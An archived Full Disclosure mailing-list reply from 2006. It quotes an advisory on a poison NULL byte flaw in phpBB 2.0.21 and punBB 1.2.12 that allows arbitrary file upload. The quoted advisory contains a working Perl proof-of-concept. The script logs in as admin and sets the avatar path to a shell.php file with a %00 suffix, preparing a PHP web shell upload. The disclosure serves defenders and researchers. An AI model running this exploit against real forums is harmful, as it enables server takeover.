Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability

Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability

From: Jerome Athias <jerome.athias_at_free.fr>
Date: Tue, 12 Sep 2006 13:58:19 +0200

Hi,

this was also nicely described for ASP by Brett Moore
http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf

(French translation :
https://www.securinfos.info/jerome/DOC/0x00_vs_ASP_File_Uploads_FR.pdf )

Best regards
/JA

3APA3A a écrit :
> Author: ShAnKaR
> Title: multiple PHP application poison NULL byte vulnerability
> Applications: phpBB 2.0.21, punBB 1.2.12
> Threat Level: Critical
> Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
>
> Poison NULL byte vulnerability for perl CGI applications was described
> in [1]. ShAnKaR noted, that same vulnerability also affects different
> PHP applications. An example of vulnerable applications are phpBB and
> punBB.
>
> Vulnerability can be used to upload or replace arbitrary files on
> server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
>
> In case of phpBB and punBB vulnerability can be exploited by changing
> location of avatar file and uploading avatar file with PHP code in EXIF
> data.
>
> A PoC exploit to change Avatar file location for phpBB:
>
>
>
> #!/usr/bin/perl -w
>
> use HTTP::Cookies;
> use LWP;
> use URI::Escape;
> unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
> my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
> $ua->cookie_jar( HTTP::Cookies->new());
>
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
> my $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> my $res = $ua->request($req);
>
> $res=$ua->get('http://'.$ARGV[0].'/login.php');
> $content=$res->content;
> $content=~ m/true&amp;sid=([^"]+)"/g;
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
>
> $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
> $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
>
>
> References:
> [1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Sep 12 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]